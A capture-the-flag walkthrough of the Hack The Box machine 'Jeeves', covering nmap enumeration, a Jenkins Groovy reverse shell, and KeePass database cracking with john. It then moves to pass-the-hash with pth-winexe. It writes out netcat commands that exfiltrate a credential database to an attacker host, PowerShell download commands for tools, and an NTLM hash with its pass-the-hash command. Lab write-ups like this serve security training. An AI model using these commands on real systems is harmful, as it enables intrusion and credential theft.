Summary
This was a fantastic Windows machine that involved deeper enumeration to identify a service running on a non standard port of 50000. With an unauthenticated connection we execute code from the provided console to obtain a foot hold as user. Running winpeas shows there is a keepass database and the privillege exploit checker shows a juicy potatoe exploit.
Processes/Technique
Web app code execution
KeePass database cracking
WIndows Data Exfiltration - (Sender) nc -nv 10.10.14.102 6363 < CEH.kdbx - (Listener) nc -nlvp 6363 > CEH,kdbx
Linux ---> Windows File Transfer - powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe, 'winPeas.exe') - With a linux http.server
Pass the hash - sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe
Alternative data stream
Tools Used
Winpeas.exe
John
RPC Dump
Dirbuster
Simple http server
keepass2john library
pth-winexe
References
https://tzusec.com/cracking-keepass-database/
Enumeration
As always we start off with a basic nmap scan followed by a version enumeration and the use of the nmap basic scanning scripts. These are denoted by;
-sC - default scripts
-sV - default versions
└─$ nmap 10.129.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT
Nmap scan report for 10.129.1.109
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
50000/tcp open ibm-db2
└─$ nmap -sC -sV 10.129.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT
Nmap scan report for 10.129.1.109
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windowsPort 80 - HTTP webserver
Port 135 - RPC Client
Port 445 - File share
Port 5000 - Jetty 9.4.1-SNAPSHOPT
Enumeration Port 80
Port 80 is running on Microsoft IIS httpd 10 which is very new and we are unlikely to find public CVE's. Further more the website provides constant errors and has no real content.
Enumeration Port 135
Using impackets rpddump.py I scrapped the service for information and found nothing particularly useful.
Enumeration Port 445
SmbClient connections required authentication
smbmap -H also required authentication
Enumeration Port 5000
Port 5000 is looking like the most likely attack vector.
The default website provides an error and has no default directory I think, so the next step in the processes is to check for hidden directories with dirbuster.
We see that /askjeeves/ is eventually found.
Exploiting Jenkins
This landing page puts us in an authenticated session right off the bat and totally opens the door for exploitation. I know from experience that apps like Jenkins and code automation servers that are found on Hack the box and the OSCP PWK labs, can often be exploited by executing code on the platform with the native script builder or console and authenticated access.
After poking around it was suggested that this app is using the groovy language. So my next focus is "Groovy reverse shells". This turns up an immediate result on github.
This part is simple enough, we copy&paste the code into the script console, entering our specific network information.
Our listener gets the catch upon running the "Build executor" in the Jenkins application. This provides us with user level privilege and we capture our first flag.
Privilege escalation
The first place to always start with privilege escalation is by uploading winpeas, a windows enumeration script that is focused on finding privileges escalation opportunities.
This is done by spinning up a python3 http server.
We can download the file onto windows with the following command run on the target windows machine.
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe, 'winPeas.exe')Referenced from here
Running winpeas provides something obvious right at the end of the results screen as it relates to keepass a common password manager.
Some simple research on KeePass database vulnerabilities yields almost immediate results.
Acquiring keepass.kdbx file
From here we browse to the suggested keepass location of C:\users\kohsuke\documents\CEH.kdbx.
The next step is to exfiltrate this information onto my local machine. After an initial search for binaries on windows that would help with this, I decided to upload nc.exe. I used this link here to reference the file transfer commands with nc.exe.
The command to download nc.exe from the windows machine, served up with a python3 http.server.
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/nc.exe, 'nc.exe')Netcat commands to upload the CEH.kdbx to a target listening server.
Netcat command to receive the upload.
Crack the database
Using this blog I found online here, https://tzusec.com/cracking-keepass-database/ we can work towards opening this file and pivoting to root.
Extract the hash
Firstly we can actually extract the hash of the master password using the john library, in particular the keepass module.
keepass2john SecretDB.kdbx└─$ keepass2john CEH.kdbx
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48└─$ keepass2john CEH.kdbx > hash.txt└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:00:23 DONE (2021-07-25 21:52) 0.04180g/s 2298p/s 2298c/s 2298C/s mwuah..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completedOpen the cracked DB
From here I installed keepass2 on my kali linux machine.
I tried all the passwords and stuffed them anywhere everywhere I could. But at the end of the day, the "Backup stuff" password was a possible hash with no user name. So I proceeded to attempted to pass the hash, initially with impacket however this was constantly erroring out, so I learned about a new tool "pth-winexe". This was successful with the "administrator" username appended to the hash and separated with a : OR % character. From here we captured the root flag.
sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe
Catch 22
Wait a sec! That is not root!
The old "alternate data stream trick". I learned about a variation of this back in highschool.
